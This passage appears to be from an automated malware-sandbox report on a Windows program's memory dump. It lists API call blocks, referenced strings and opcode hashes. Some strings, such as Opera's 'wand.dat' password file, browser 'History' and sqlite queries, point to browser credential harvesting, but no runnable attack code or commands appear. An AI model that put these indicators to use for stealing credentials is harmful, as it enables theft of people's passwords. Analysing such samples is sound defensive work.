                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1471605966-0
                                                                                                                  • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                  • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                  APIs
                                                                                                                  • wcscpy.MSVCRT ref: 0044475F
                                                                                                                  • wcscat.MSVCRT ref: 0044476E
                                                                                                                  • wcscat.MSVCRT ref: 0044477F
                                                                                                                  • wcscat.MSVCRT ref: 0044478E
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                  • String ID: \StringFileInfo\
                                                                                                                  • API String ID: 102104167-2245444037
                                                                                                                  • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                  • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                  APIs
                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                  • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem$PlacementWindow
                                                                                                                  • String ID: AE
                                                                                                                  • API String ID: 3548547718-685266089
                                                                                                                  • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                  • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                  • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                  • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _memicmpwcslen
                                                                                                                  • String ID: @@@@$History
                                                                                                                  • API String ID: 1872909662-685208920
                                                                                                                  • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                  • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                  • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                  • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                  • String ID: </%s>
                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                  • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                  • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040E770
                                                                                                                  • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendmemset
                                                                                                                  • String ID: AE$"
                                                                                                                  • API String ID: 568519121-1989281832
                                                                                                                  • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                  • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                  • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                  • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040D58D
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                  • String ID: caption
                                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                                  • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                  • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                  • String ID: MS Sans Serif
                                                                                                                  • API String ID: 210187428-168460110
                                                                                                                  • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                  • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName_wcsicmpmemset
                                                                                                                  • String ID: edit
                                                                                                                  • API String ID: 2747424523-2167791130
                                                                                                                  • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                  • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                  • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                  • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                  • API String ID: 3150196962-1506664499
                                                                                                                  • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                  • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                  • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                  • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3384217055-0
                                                                                                                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 368790112-0
                                                                                                                  • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                  • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                  • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1889144086-0
                                                                                                                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                                  APIs
                                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                                  • GetLastError.KERNEL32 ref: 0041810A
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1661045500-0
                                                                                                                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                                  Strings
                                                                                                                  • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                                  • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                                  • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                  • API String ID: 1297977491-2063813899
                                                                                                                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040560C
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                  • String ID: *.*$dat$wand.dat
                                                                                                                  • API String ID: 2618321458-1828844352
                                                                                                                  • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                  • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                  • wcslen.MSVCRT ref: 00410C74
                                                                                                                  • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                                  • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                                  • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1549203181-0
                                                                                                                  • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                                  • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3550944819-0
                                                                                                                  • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
